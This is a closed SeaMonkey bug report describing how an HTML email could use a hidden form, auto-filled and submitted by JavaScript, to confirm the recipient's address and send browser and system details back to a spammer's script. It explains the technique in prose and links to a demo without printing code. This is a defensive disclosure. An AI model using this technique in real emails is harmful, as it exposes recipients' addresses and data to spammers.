Closed Bug 315352 Opened 20 years ago Closed 20 years ago

How spammers can identify your email without you doing anything.

Categories

(SeaMonkey :: MailNews: Message Display, defect)

Product:
SeaMonkey
Component:
MailNews: Message Display
Platform:
x86
Windows XP
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

(Not tracked)

Status:
RESOLVED DUPLICATE of bug 315351

People

(Reporter: healyd, Unassigned)

References

(
URL
)

Details

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 There is a potential hole in Mozilla's email account that allows a spammer to confirm an email address by just opening the email message. This is done by placing the email address in an html form's hidden field. The spammer can pass information such as browser, operating system, screen dimensions, colordepth, the size of your history in other hidden fields. A JavaScript form function is loaded when the page is loaded, and fills all the hidden fields with JavaScript variables. It then submits the form back to the spammer who uses Perl to gather intelligence such as IP Address and UserID. VIOLA! The user has your email plus demographic information to sell to other spammers. This happens when JavaScript is enabled. This also happens in Microsoft email clients, the only difference between you and them is JavaScript is enabled in Microsoft and Mozilla is disabled by default. Due to the far reaching implications that this could have on the war on spam, please disable all JavaScript interactions with HTML forms in your email. I placed an online demo on my website at http://www.geocities.com/overlord_77520/email_demographics.html Reproducible: Always Steps to Reproduce: 1.Go to my websites and download the zipped file. 2.Enable JavaScript and set up the CGI File. 3.Try to send an email with an HTML Form and see if the software sends the data back to the CGI prgoram. Actual Results: The spammer has your email address. Expected Results: The security systems will disable the sending of the HTML Forms. This is a MAJOR MAJOR MAJOR security flaw. If the spammers ever learn this, they will turn the spam wars heavily in their favor. The fact is that Mozilla's email JavaScript is disabled while Microsoft's is not could be your opportunity to exploit the marketshare by making fun of Microsoft's lack of security.
*** This bug has been marked as a duplicate of 315351 ***
Status: UNCONFIRMED → RESOLVED
Closed: 20 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.